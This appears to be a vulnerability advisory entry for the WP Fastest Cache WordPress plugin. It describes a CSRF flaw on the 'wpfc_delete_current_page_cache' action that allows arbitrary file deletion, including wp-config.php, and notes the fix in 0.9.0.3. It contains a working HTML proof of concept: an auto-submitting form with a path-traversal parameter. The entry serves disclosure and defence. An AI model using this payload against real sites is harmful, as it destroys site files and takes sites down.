WP Fastest Cache < 0.9.0.3 - Cross-Site Request Forgery (CSRF) Arbitrary File Deletion



Description
The plugin did not have a CSRF nonce check on the "wpfc_delete_current_page_cache" action, allowing CSRF attacks against authenticated users to delete arbitrary files, including the wp-config.php file.
Proof of Concept
    <html>
    <head></head>
    <body>
    <form id="form" action="https://example.com/wp-admin/admin-ajax.php?path=/../../../.." method="post">
    <input type="hidden" name="action" value="wpfc_delete_current_page_cache"/>
    </form>
    <script>document.form.submit();</script>
    </body>
    </html>

Affects Plugin

fixed in version 0.9.0.3

References

URL https://wearetradecraft.com/advisories/tc-2020-0001/
URL https://plugins.trac.wordpress.org/changeset/2235160/wp-fastest-cache

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher Glyn Wintle (Tradecraft)
Views 1425
Verified No
WPVDB ID 10121

Timeline

Publicly Published 2020-02-05 (4 months ago)
Added 2020-03-09 (3 months ago)
Last Updated 2020-03-10 (3 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin